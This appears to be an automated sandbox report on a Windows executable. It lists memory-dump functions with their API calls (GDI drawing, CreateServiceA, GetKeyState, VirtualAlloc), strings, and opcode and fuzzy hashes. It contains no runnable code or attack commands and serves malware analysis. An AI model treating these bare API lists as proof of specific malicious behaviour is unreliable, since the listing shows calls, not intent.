Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a71322030c58388a4de99f6df915f02f4316f54ca6acce9149d0258a6ef856d
Instruction ID: f17397ba129ab8bf9ee4b4eca0daee9b6399c90931937d9e54c4e20151bd74f4
Opcode Fuzzy Hash: 1a71322030c58388a4de99f6df915f02f4316f54ca6acce9149d0258a6ef856d
Instruction Fuzzy Hash: 5751CAB5E04209EFDB44CF94C985EAEBBB5BF48310F108159EA05AB381D774E941CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031F6, Relevance: 1.6, APIs: 1, Instructions: 113libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000), ref: 0040325D

Memory Dump Source

Source File: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
Instruction ID: 832426f34c370743946e7dbe9b7480746cfad88969b855e212328ef0c2c29d72
Opcode Fuzzy Hash: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
Instruction Fuzzy Hash: F4518674E0420ADFDB04CF88C890BAEBBB5BF49305F2485A9D515BB391C734AA85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA6, Relevance: 1.3, APIs: 1, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,?,?,?,00401C9E), ref: 00402F6A

Memory Dump Source

Source File: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3503576346fbd1af89b13a22ba184c1a90c619a6ca117b6ea0409ddff3e0efb3
Instruction ID: fc1c6aa4f9fed2776ae7c69848b76e5bcf4f47f5effe7b9e5d5076e5b80db1a4
Opcode Fuzzy Hash: 3503576346fbd1af89b13a22ba184c1a90c619a6ca117b6ea0409ddff3e0efb3
Instruction Fuzzy Hash: A341FFB4A00209DFCB04CF84C990EAEB7B5FF48304F208599E915AB391D770EE51CBA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042D3A8, Relevance: 48.5, APIs: 32, Instructions: 502windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 0042D428
GetDC.USER32(00000000), ref: 0042D439
CreateCompatibleDC.GDI32(?), ref: 0042D44A
CreateBitmap.GDI32(00000001,?,00000001,00000001,00000000), ref: 0042D496
CreateCompatibleBitmap.GDI32(?,00000001,?), ref: 0042D4BA
SelectObject.GDI32(8B5EF045,?), ref: 0042D718
SelectPalette.GDI32(8B5EF045,00000000,00000000), ref: 0042D75B
RealizePalette.GDI32(8B5EF045), ref: 0042D767
SetTextColor.GDI32(8B5EF045,00000000), ref: 0042D7D0
SetBkColor.GDI32(8B5EF045,00000000), ref: 0042D7EA
SetDIBColorTable.GDI32(8B5EF045,00000000,00000002,?,8B5EF045,00000000,8B5EF045,00000000,8B5EF045,?,?,?,00000000,00000000,0042D980), ref: 0042D832
FillRect.USER32 ref: 0042D7B8

Part of subcall function 0042774C: GetSysColor.USER32(00000000), ref: 00427764

PatBlt.GDI32(8B5EF045,00000000,00000000,?,?,00FF0062), ref: 0042D854
CreateCompatibleDC.GDI32(?), ref: 0042D867
SelectObject.GDI32(0042DF08,00000000), ref: 0042D88A
SelectPalette.GDI32(0042DF08,00000000,00000000), ref: 0042D8A7
RealizePalette.GDI32(0042DF08), ref: 0042D8B3
SetTextColor.GDI32(0042DF08,00000000), ref: 0042D8D1
SetBkColor.GDI32(0042DF08,00000000), ref: 0042D8EB
BitBlt.GDI32(8B5EF045,00000000,00000000,?,?,0042DF08,00000000,00000000,00CC0020), ref: 0042D913
SelectPalette.GDI32(0042DF08,?,000000FF), ref: 0042D928
SelectObject.GDI32(0042DF08,0042DF33), ref: 0042D935
DeleteDC.GDI32(0042DF08), ref: 0042D950

Part of subcall function 00428848: CreateBrushIndirect.GDI32(?), ref: 00428902

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: 5d3eb6ee972c885ecd54ff5de95114dba650395462cec18b85dd6ee43c2cb1f2
Instruction ID: f9225a97cbe7413657bdeddb044ae4e5e045cc61df0bbab740ca1380dfbb60b8
Opcode Fuzzy Hash: 5d3eb6ee972c885ecd54ff5de95114dba650395462cec18b85dd6ee43c2cb1f2
Instruction Fuzzy Hash: 6B12FB75A00218AFDB10EF99D885F9EB7F8EB08314F95845AF914EB251C778ED40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0043F2BC, Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 410COMMON

Download Yara Rule

Strings

vcltest3.dll, xrefs: 0043F6DD
RegisterAutomation, xrefs: 0043F704

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: fd4b6b75d9bb1c78591b5a9860331acb63a22d5708872bb32838daf2deea38d0
Instruction ID: 97d0d471fb3a6b4dc6ba99d0bf8d573f50196fd8149a23ee1d7dd201d89dff02
Opcode Fuzzy Hash: fd4b6b75d9bb1c78591b5a9860331acb63a22d5708872bb32838daf2deea38d0
Instruction Fuzzy Hash: 32F17875A00104EFDB14EBA9C585B9EB7B4AF0C310F2491B6E444AB362C73CEE49CB49

Uniqueness

Uniqueness Score: -1.00%

Function 004072E8, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 275serviceCOMMON

Download Yara Rule

APIs

CreateServiceA.ADVAPI32(?,00000000,00000000,000F003F,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004073B5
GetLastError.KERNEL32(?,00000000,00000000,000F003F,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040743F

Strings

The specified service name is invalid., xrefs: 00407584
The specified service already exists in this database., xrefs: 0040762C
x, xrefs: 00407626
A circular service dependency was specified., xrefs: 004074D9
Unknown error occurred, xrefs: 00407662
The handle to the SCM database does not have the SC_MANAGER_CREATE_SERVICE access right., xrefs: 004074A0
T[K, xrefs: 004072EE
The display name already exists in the service control manager database either as a service name or as another display name., xrefs: 00407512
The handle to the specified service control manager database is invalid., xrefs: 0040754B
The user account name specified in the lpServiceStartName parameter does not exist., xrefs: 004075F6
A parameter that was specified is invalid., xrefs: 004075BD

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastService
String ID: A circular service dependency was specified.$A parameter that was specified is invalid.$T[K$The display name already exists in the service control manager database either as a service name or as another display name.$The handle to the SCM database does not have the SC_MANAGER_CREATE_SERVICE access right.$The handle to the specified service control manager database is invalid.$The specified service already exists in this database.$The specified service name is invalid.$The user account name specified in the lpServiceStartName parameter does not exist.$Unknown error occurred$x
API String ID: 3397146976-2289442128
Opcode ID: d92e56a0d911b5984b7611ab66b825c3866f32d815bf734b4578a089168f9508
Instruction ID: f5e429fbb6761d67663c6e9b9afc8e57ecad33adbc7aa6b21fdc9de273aca9e7
Opcode Fuzzy Hash: d92e56a0d911b5984b7611ab66b825c3866f32d815bf734b4578a089168f9508
Instruction Fuzzy Hash: F9B11D3091011EABDF00EF95D846ADEB3B9FF55308F148427A80067256D73DAA1ACF9B

Uniqueness

Uniqueness Score: -1.00%

Function 0043B1BC, Relevance: 20.0, APIs: 13, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 5b5d2fce9b87ddb96c08eeac13ad1a056a3e28771e853bc4460b91dcd1dc6e8a
Instruction ID: 08904c9c48e3fcd67ebb951fec98e207c67a81de92ad3ed27519d7a66667c30f
Opcode Fuzzy Hash: 5b5d2fce9b87ddb96c08eeac13ad1a056a3e28771e853bc4460b91dcd1dc6e8a
Instruction Fuzzy Hash: 99122B34A04104EFDB00DFA9D985BADB7F5EB08304F2455A6E604EB362D779EE40DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043A078, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(00000000), ref: 0043A08D
BeginPaint.USER32(00000000,?,00000000), ref: 0043A0DA
DrawIcon.USER32 ref: 0043A0F3
EndPaint.USER32(00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0043A105

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$BeginDrawIconIconic
String ID:
API String ID: 2397676602-0
Opcode ID: cf674120b9fb715496bf60f8f93af8310221411bf7dd9be21aeea7f6f9dd7cc9
Instruction ID: ed4b0008104b30ef575947dac7a2a1ba027b19d55410d16135ab5fb393099b12
Opcode Fuzzy Hash: cf674120b9fb715496bf60f8f93af8310221411bf7dd9be21aeea7f6f9dd7cc9
Instruction Fuzzy Hash: E211FE75D00109EBCB00EBE5CA42A9EB7B8AF08304F604196F914A7352E7789E45DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00441118, Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00441145
SetClassLongA.USER32(?,000000F2,00000000,?,00000080,00000001,00000000), ref: 0044115C
IsIconic.USER32(?), ref: 0044116A
InvalidateRect.USER32(?,00000000,000000FF,?), ref: 0044117E

Part of subcall function 0043FA10: LoadIconA.USER32(00000000,00007F00), ref: 0043FA37

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassIconIconicInvalidateLoadLongMessageRectSend
String ID:
API String ID: 3567627762-0
Opcode ID: 5dadca02a016229a7501bc70f478362880831d68a787f851fd87302e78b84e93
Instruction ID: 1684cf5d8a5e81f7aa2ff697b294fbcd461055f2ec2077d80ed93c92903146bd
Opcode Fuzzy Hash: 5dadca02a016229a7501bc70f478362880831d68a787f851fd87302e78b84e93
Instruction Fuzzy Hash: F9012570914104FFEB40EB99DE82F9D73E8AF09310F640296B524EB3E2D675EE409B58

Uniqueness

Uniqueness Score: -1.00%

Function 004A51E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,004082DB,004081E5,004082DB,?,004A542E,00000000,004082DB,00000000,004081E5,?,004A546A,Abnormal program termination,004A60A9,?,?), ref: 004A51EC
wsprintfA.USER32 ref: 004A5225

Strings

%02d/%02d/%04d %02d:%02d:%02d.%03d , xrefs: 004A521B

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: LocalTimewsprintf
String ID: %02d/%02d/%04d %02d:%02d:%02d.%03d
API String ID: 1577811021-3388318165
Opcode ID: 5e69a9e011f4012dd077d2f6034ede54a7ff8170a5da8018e4a9718b2579f310
Instruction ID: 1f415d967b52de1b8347191f680f986bb85542d7f3c5d5a8e599f9972b24290c
Opcode Fuzzy Hash: 5e69a9e011f4012dd077d2f6034ede54a7ff8170a5da8018e4a9718b2579f310
Instruction Fuzzy Hash: FEE0ED8644C6216583549F8B5C11A7BB1E8A9DCB11F48494EB5D480191F66C8484D33E

Uniqueness

Uniqueness Score: -1.00%

Function 0043B0F0, Relevance: 4.6, APIs: 3, Instructions: 62keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0043B0FE
GetKeyState.USER32(00000011), ref: 0043B129
GetKeyState.USER32(00000010), ref: 0043B137

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 99876722e7064260753ed0a3fea789259b3ec02ea35e5c8c8094f35175885a81
Instruction ID: b9073bfd68403221aaf011d2a5c2c705a376dcf4ab74949e388a6874f4a10b5c
Opcode Fuzzy Hash: 99876722e7064260753ed0a3fea789259b3ec02ea35e5c8c8094f35175885a81
Instruction Fuzzy Hash: 4E218438514204DFDF00EB54C599BDD73B0EF08354F5482A6EA046B3A2DB799E81DB89

Uniqueness

Uniqueness Score: -1.00%

Function 0043E268, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0043E26E
GetCursorPos.USER32(?,00000000,00000064), ref: 0043E292
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0043E2B5

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: b486f6a40b738c809892cb454fdd681ca40850be6742e3e51c335c6e50b1b756
Instruction ID: 6cdbefac43931293f9a2332ffba2ed0cee7d01d43bd7d66524355d8e9819db7b
Opcode Fuzzy Hash: b486f6a40b738c809892cb454fdd681ca40850be6742e3e51c335c6e50b1b756
Instruction Fuzzy Hash: D3F08931504205CBD710E7AAEC46BA733AD9B0431CF10067BE514C62F2EB79D954DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004A52D8, Relevance: 4.5, APIs: 3, Instructions: 24threadCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,004A539C,?,?,004082DB,?,?,004AA510,004A9EEC,00000000,00000000,004AAAD4), ref: 004A52DE
GetCurrentThreadId.KERNEL32 ref: 004A52FD
EnumThreadWindows.USER32(00000000,004A52C4), ref: 004A5303

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CurrentEnumVersionWindows
String ID:
API String ID: 4062777034-0
Opcode ID: c2e2c2cdb88269fc518f46c64cc93536c31dc7734da96eb58cbc61b97a114a86
Instruction ID: 1448f30a9bd969c6c50d0a6babc80e1e3abd99f4151da4ce5ec960008feacefe
Opcode Fuzzy Hash: c2e2c2cdb88269fc518f46c64cc93536c31dc7734da96eb58cbc61b97a114a86
Instruction Fuzzy Hash: BAE086A1729A0046EB103A3D461576F118597A2391F50452FB080862CACABC8882962D

Uniqueness

Uniqueness Score: -1.00%

Function 004A0004, Relevance: 1.8, Strings: 1, Instructions: 514COMMON

Download Yara Rule

Strings

+, xrefs: 004A018A

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: c98282507e0a24b2c6600fb5843c85a38565535543ef912ba7dc828c4d3ea5a3
Instruction ID: 856420a246b51fefae2605ba1becfcdeab6475052bcc38477c5907c9353a637c
Opcode Fuzzy Hash: c98282507e0a24b2c6600fb5843c85a38565535543ef912ba7dc828c4d3ea5a3
Instruction Fuzzy Hash: 8D226EB0D05209DFEF14CF98C8457EEBBB1BF6A314F24816AD405A7281E3789D86CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043A1C4, Relevance: 1.5, APIs: 1, Instructions: 25windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(00000000), ref: 0043A1D9

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: 94cbac4b0d68199e9a30f8b208a110adf38c15b5bf754f4b4f11f7046ffa1471
Instruction ID: 8f046f6dcd33cf1306ccc10937619db3456c63edd71e4cf4f84a7255f33a163e
Opcode Fuzzy Hash: 94cbac4b0d68199e9a30f8b208a110adf38c15b5bf754f4b4f11f7046ffa1471
Instruction Fuzzy Hash: 2EF0C030908208EFDB00EF99D94599DB7F4EF49314F204196E854A7351EB75AE10DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004443D4, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Rectangle
String ID:
API String ID: 3471341626-0
Opcode ID: ff6befef1fd120dcb018fbf331320cf3e0a96ce3b157630a07e5959f5c087097
Instruction ID: 30b1b3bf66a7ab1b58f4d636e19b9e58cf341ed5cd88e03ac69ef5bd97f5862a
Opcode Fuzzy Hash: ff6befef1fd120dcb018fbf331320cf3e0a96ce3b157630a07e5959f5c087097
Instruction Fuzzy Hash: EE91B875A10109EFDB44DF9DC981E9EB7F9AF48304F218099F514EB362EA35EE409B18

Uniqueness

Uniqueness Score: -1.00%

Function 00459368, Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 0045939B
GetClientRect.USER32 ref: 004593BE
GetWindowRect.USER32 ref: 004593D0
MapWindowPoints.USER32 ref: 004593E6
OffsetRect.USER32(?,?,?), ref: 004593FB
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 00459414
InflateRect.USER32(?,6A00077C,6A00077C), ref: 0045943B
GetWindowLongA.USER32 ref: 00459455
DrawEdge.USER32(?,?,8B0000F0,0000F030), ref: 0045956F
IntersectClipRect.GDI32(?,?,?,?,?), ref: 00459588
OffsetRect.USER32(?,?,?), ref: 004595B0
GetRgnBox.GDI32(00000001,?), ref: 004595C2
MapWindowPoints.USER32 ref: 004595D8
IntersectRect.USER32 ref: 004595E9
OffsetRect.USER32(?,?,?), ref: 004595FE
FillRect.USER32 ref: 0045961A
ReleaseDC.USER32 ref: 00459639

Strings

, xrefs: 0045945D

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
String ID:
API String ID: 2490777911-3916222277
Opcode ID: c0913f83bfa133df4a2b46a9dcd3ef1a245e69544c010952b4de66de0e86d145
Instruction ID: 7ac648eb7ac36f5448ac233007eb360c830b78f90da002b2c3a5b42ba59573d4
Opcode Fuzzy Hash: c0913f83bfa133df4a2b46a9dcd3ef1a245e69544c010952b4de66de0e86d145
Instruction Fuzzy Hash: ACB10B71A04148EFCB41DBE8C985EEEB7F9AF09304F1441A6F908E7252C778AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0048903C, Relevance: 27.1, APIs: 9, Strings: 9, Instructions: 110COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000,?,?,00000000,00000000,?,0048917E,?,?,?,00440DBE), ref: 00489076
CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0048917E,?,?,?,00440DBE), ref: 00489080
CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0048917E,?,?,?,00440DBE), ref: 0048909F
CharNextA.USER32(00000000,?,?,00000000,00000000,?,0048917E,?,?,?,00440DBE), ref: 004890A9
CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0048917E,?,?,?,00440DBE), ref: 004890D5
CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0048917E,?,?,?,00440DBE), ref: 004890DF
CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0048917E,?,?,?,00440DBE), ref: 00489107
CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0048917E,?,?,?,00440DBE), ref: 00489111

Strings

, xrefs: 00489054
", xrefs: 004890CF
", xrefs: 00489070
", xrefs: 00489094
, xrefs: 004890B8
", xrefs: 004890FC
", xrefs: 00489059
, xrefs: 00489129
", xrefs: 0048905E

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID: $ $ $"$"$"$"$"$"
API String ID: 3213498283-3597982963
Opcode ID: cd6e2ec7ff42639d267b7ad66de297c11db904070ec7bef431ffa33893c256a7
Instruction ID: c8f36bb818e64f52a118b230250ed297c04f4e04f424ee689d4cce8cee819680
Opcode Fuzzy Hash: cd6e2ec7ff42639d267b7ad66de297c11db904070ec7bef431ffa33893c256a7
Instruction Fuzzy Hash: 57319791608BD12EFB3235B58DD837E29C48B4B754F1C0DABA5424B357D6AC4C41D32A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E048, Relevance: 23.0, APIs: 15, Instructions: 491COMMON

Download Yara Rule

